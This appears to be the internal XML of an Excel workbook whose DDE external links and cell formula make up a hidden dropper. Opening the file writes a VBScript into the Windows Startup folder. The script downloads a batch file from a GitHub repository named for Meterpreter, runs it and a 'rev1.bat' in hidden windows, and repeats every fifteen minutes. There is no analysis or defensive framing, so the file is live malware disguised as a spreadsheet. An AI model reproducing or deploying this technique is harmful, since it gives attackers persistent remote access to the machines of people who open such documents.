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MAR\Documents\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CF39B318-E353-459D-A2D1-4616ADC63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Do &gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot;">
    <ddeItems>
      <ddeItem name="nm.A1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  Set objShell = CreateObject(&quot;WScript.Shell&quot;) &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot;">
    <ddeItems>
      <ddeItem name="nm.A1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  objShell.Run &quot;cmd /c curl https://raw.githubusercontent.com/0x2034/meterpreter1/main/nihbtdtdow1.bat -o %temp%\nihbtdtdow1.bat&quot;, 0, True &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/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  objShell.Run &quot;powershell -WindowStyle Hidden -Command Start-Process -FilePath %temp%\nihbtdtdow1.bat -WindowStyle Hidden&quot;, 0, True &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1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  objShell.Run &quot;powershell -c Start-Process -FilePath %temp%\rev1.bat -WindowStyle Hidden&quot;, 0, True &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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  Wscript.Sleep 900000 &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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echo Loop &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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cd &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup&quot; &amp;&amp; start.vbs">
    <ddeItems>
      <ddeItem name="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e" cm="1">
        <f t="array" ref="A1">[1]!nm.A1&amp;[2]!nm.A1&amp;[3]!nm.A1&amp;[4]!nm.A1&amp;[5]!nm.A1&amp;[6]!nm.A1&amp;[7]!nm.A1&amp;[8]!nm.A1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Samy</dc:creator>
  <cp:lastModifiedBy>Omar Samy</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-27T03:16:17Z</dcterms:modified>
</cp:coreProperties>
</file>